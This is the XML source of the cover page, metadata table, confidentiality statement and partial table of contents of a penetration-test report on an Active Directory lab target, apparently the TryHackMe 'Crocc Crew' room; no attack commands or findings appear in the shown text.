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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B0341D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CONFIDENTIAL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="900" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2A44"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>Cooctus Corp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="60" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="34456B"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Internal Network Penetration Test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="40" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Active Directory Security Assessment - Findings Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="40" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="10" w:space="10" w:color="C7CEDA"/>
          <w:bottom w:val="single" w:sz="10" w:space="10" w:color="C7CEDA"/>
        </w:pBdr>
        <w:spacing w:before="500" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="5B6472"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Engagement: TryHackMe - “Crocc Crew”  •  Category: Active Directory  •  Difficulty: Insane</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="500" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="7200" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="70" w:type="dxa"/>
          <w:start w:w="110" w:type="dxa"/>
          <w:bottom w:w="70" w:type="dxa"/>
          <w:end w:w="110" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0" w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2499"/>
        <w:gridCol w:w="4701"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2499" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="EEF1F5" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2A44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4701"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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cooctus Corp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2499" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="F2F4F8" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2A44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Assessment Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4701"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spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Internal Network Penetration Test (Assumed-Breach / Black-Box hybrid)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2499" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="EEF1F5" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2A44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Target Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4701"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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.64.148.30  (DC.COOCTUS.CORP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2499" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="F2F4F8" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2A44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4701"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spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>COOCTUS.CORP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2499" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="EEF1F5" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2A44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Assessor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4701"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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Lead Penetration Tester</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2499" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="F2F4F8" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2A44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Report Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4701"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spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2026-07-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2499" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="EEF1F5" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2A44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4701"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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Business Confidential</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2499" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="F2F4F8" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2A44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4701"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spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="14" w:space="6" w:color="1F2A44"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc234251528"/>
      <w:r>
        <w:rPr/>
        <w:t>Confidentiality Statement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This document contains confidential and proprietary information belonging to Cooctus Corp. The information within, including the described attack paths, credentials, and technical findings, is intended solely for the recipient organization. Unauthorized disclosure, duplication, or distribution of any portion of this report is strictly prohibited. All sensitive material was handled in accordance with the rules of engagement and destroyed upon completion of the assessment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="5B6472"/>
        </w:rPr>
        <w:t>The activities described herein were performed in a controlled, authorized lab environment for training and validation purposes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="14" w:space="6" w:color="1F2A44"/>
        </w:pBdr>
        <w:spacing w:before="260" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc234251529"/>
      <w:r>
        <w:rPr/>
        <w:t>Table of Contents</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique w:val="true"/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="IndexLink"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-2" \h</w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="IndexLink"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc234251528">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251528 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Confidentiality Statement</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251529">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251529 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Table of Contents</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251530">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251530 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>1. Executive Summary</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251531">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251531 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Summary of the Attack Path</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251532">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251532 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Business Impact</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251533">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251533 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Key Findings at a Glance</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251534">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251534 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>2. Assessment Overview</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251535">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251535 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>2.1 Scope</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251536">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251536 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>2.2 Objectives</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251537">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251537 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>2.3 Methodology</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251538">
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve">PAGEREF _Toc234251538 \h</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>2.4 Toolset</w:t>
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="720"/>
              <w:tab w:val="right" w:pos="9350" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc234251539">
